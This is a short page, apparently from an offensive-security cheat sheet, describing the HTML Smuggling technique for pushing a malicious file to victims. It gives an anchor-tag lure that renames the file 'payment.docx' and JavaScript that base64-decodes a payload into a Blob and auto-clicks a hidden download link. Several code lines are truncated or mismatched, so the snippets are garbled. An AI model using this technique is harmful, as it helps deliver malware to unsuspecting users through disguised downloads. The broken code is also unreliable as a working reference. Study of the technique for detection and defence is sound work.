HTML Smuggling

Last modified: 2023-07-26


Attackers hosts a malicious file and can invite victim to download it using the HTML Smuggling technique.


Attackers can use anchor tag to invite victim to download a malicious file as below. When clicking, the malicious file is downloaded as the name “payment.docx”.

<a href="/malicious_doc.docx" download="payment.docx">Cliek Here</a>

Alternatively, attackers can also use JavaScript, then let browsers to download a malicious file when loading the page, or invite victim to click download button.

var a = document.createElement('a'); = 'malicious_doc.docx'

Using JavaScript Blob

By using blob, attackers can let victim to download a malicious file while obfuscate its content by encoding/decoding malicious code.

// Decode Base64 encoded malicious code
var malBase64 = '<BASE64_ENCODED_CODE>';
var malBinStr = window.atob(malBase64);
var malLen = malBinStr.length;
var malBytes = new Uint8Array(malLen);
for (var i = 0; i < malLen; i++) {
	malBytes[i] = malBin.charCodeAt(i);

// Create a blob
// 'octet/stream' allows any file types.
var malBlob = new Blob([malBytes.buffer], {type: 'octet/stream'});
var malUrl = window.URL.createObjectURL(malBlob);

// Create a downloadable anchor (automatically download)
var a = document.createElement('a'); = 'none';
a.href = malUrl; = '';
// this anchor will be clicked automatically.;